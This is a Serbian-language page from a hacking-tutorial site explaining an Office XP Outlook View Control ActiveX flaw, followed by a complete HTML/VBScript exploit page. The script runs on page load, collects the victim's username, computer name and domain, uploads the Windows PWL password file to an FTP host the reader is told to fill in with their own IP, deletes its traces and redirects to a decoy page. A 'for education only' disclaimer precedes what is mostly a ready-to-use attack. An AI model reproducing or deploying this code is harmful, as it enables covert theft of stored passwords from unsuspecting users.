Bug u Office XP (uzimanje PWL fajla) - Hakovanje - Hack Tutorials - Biohazard Hack
Sreda, 2016-12-07, 3:24 PM
Welcome Guest | RSS
Biohazard Hacking Team
Main | Hack Tutorials | Registration | Login
Login form

Site menu
Catalog categories
Osnove [4]
Osnove o hakovanju
Hakovanje [9]
Hakovanje svega i svacega!
Virusi & Trojanci [5]
Naucite sta su i kako se prave!
Alati [5]
Naucite kako da koristite alate za hack
mIRC [2]
Naucite kako da mIRC pretvorite u oruzije!
Search
Site friends
Our poll
Oceni moj sajt
Total of answers: 527
Main » Articles » Hakovanje

Bug u Office XP (uzimanje PWL fajla)

Napomena: Zelim da istaknem da je ovaj tutorial namenjen samo u edukativne svrhe i da autor ovog teksta nije odgovoran za bilo kakvu stetu koju napravite primenom ovih informacija.


[Kratak opis]

Kao i svaki bug, i ovaj ce pre ili kasnije biti uklonjen, ali evo o cemu se radi. Ako korisnik poseti specijalno dizajniranu stranicu sa Internet Explorerom, ili otvori ili pogleda poruku za programom OutLook XP, proizvoljne komande mogu biti izvrsene na korisnickom kompu. Koristeci ovaj MSOFFICEXP bug omogucava vam se jos i citanje, menjanje i brisanje poruka iz korisnikovih OutLook XP foldera. Ovaj problem je moguce izvrsiti na svim sigurnosnim nivoima IEa, bez ikakvog upozorenja korisnika!

[Detaljnije]

Problem je u ActivX-u. Prilikom instalacije OfficeXP instalira malicioznu ActiveX kontrolu - "Microsoft Outlook View Control". Ova kontrola izlaze svojsto "selection" koje daje pristup korisnickim porukama. Takodje Vam izlaze Outlook "Application" objekat koji moze dovesti do izvrsenja programa na korisnickom kompu. U kombinaciji sa Windows Scripting Hostom, mogucnosti su beskrajne!

[Resenje problema]

Za sada je jedino resenje da uninstalirate Microsoft OfficeXP (a moze i Windows ;)

[Primer koriscenja propusta]
-----| seci ovde |-------
<html>
<head>
<title>otvaranje fajla</title>
</head>
<body text="#00FF00" bgcolor="#000000">

<p align="center"><blink><font size="6">Sacekajte par sekundi, i
bicete redirektovani...</font></blink></p>
<p align="center">stranicu napravio: <a href="mailto:vladadj@ptt.yu">dql</a></p>

<p align="center">
<SCRIPT LANGUAGE=vbscript>
<!--
Sub f
    On Error Resume Next
    set sel=o1.object.selection
    set obj1=sel.item(1)
    set wshn = obj1.Session.Application.createobject("wscript.network")
    set wshs = obj1.Session.Application.createobject("wscript.shell")
    Set fso = obj1.Session.Application.CreateObject("Scripting.FileSystemObject")

    sIme=wshn.username          'uzimanje imena logovanog korisnika
    'ciscenje imena od razmaka
    for i=1 to len(sIme)
        if mid(sIme,i,1)=" " then
            tmp=""
        else
            tmp=mid(sIme,i,1)
        end if
        sTempIme = sTempIme + tmp
    next
    'skracenje na duzinu od 8 znakova
    if len(sTempIme)>8 then sTempIme=left(sTempIme,8)
    sIme=sTempIme

    Set file = fso.CreateTextFile ("c:\windows\temp\komande.txt", TRUE)
    file.write "user"+vbcrlf    'ime korisnickog imena za logovanje na ftp sajt
    file.write "pass"+vbcrlf    'sifra za logovanje na ftp sajt
    file.write "put c:\windows\"+cstr(sIme)+".pwl"+vbcrlf
    file.write "put c:\windows\temp\"+cstr(sIme)+".txt"+vbcrlf
    file.write "quit"+vbcrlf
    file.Close
    Set file = fso.CreateTextFile ("c:\windows\temp\"+cstr(sIme)+".txt", TRUE)
    file.write "ime kompa: "+cstr(wshn.computername)+vbcrlf
    file.write "ime usera: "+cstr(wshn.username)+vbcrlf
    file.write "domen: "+cstr(wshn.userdomain)+vbcrlf
    file.close
    Set file = fso.CreateTextFile ("c:\windows\temp\fajl.bat", TRUE)
    file.write "ftp -s:c:\windows\temp\komande.txt 127.0.0.1"+vbcrlf    'umesto 127.0.0.1 unesite IP hosta na koji treba da se uploaduje PWL
    file.write "del c:\windows\temp\komande.txt"+vbcrlf
    file.write "del c:\windows\temp\"+cstr(sIme)+".txt"+vbcrlf
    file.write "del c:\windows\temp\fajl.bat"+vbcrlf
    file.close
    wshs.run "c:\windows\temp\fajl.bat",vbhide
   
    location = "pocetna.htm"    'preusmeravanje na laznu stranicu
End Sub

settimeout "f",2000

-->
</SCRIPT>

<OBJECT classid=clsid:0006F063-0000-0000-C000-000000000046 id=o1
style="HEIGHT: 1; WIDTH: 1"><PARAM NAME="Folder" VALUE="Inbox">
</OBJECT>

</body>
</html>
-----| seci ovde |-------

[Zavrsna Rec]

Toliko o ovom bagu, nadam se da ce Vam ove informacije biti od koristi!





Category: Hakovanje | Added by: Neo_MaGGoT (2008-09-08) | Author: Predrag
Views: 1358 | Rating: 0.0/0 |
Total comments: 0
Only registered users can add comments.
[ Registration | Login ]
Copyright MyCorp © 2016
Website builderuCoz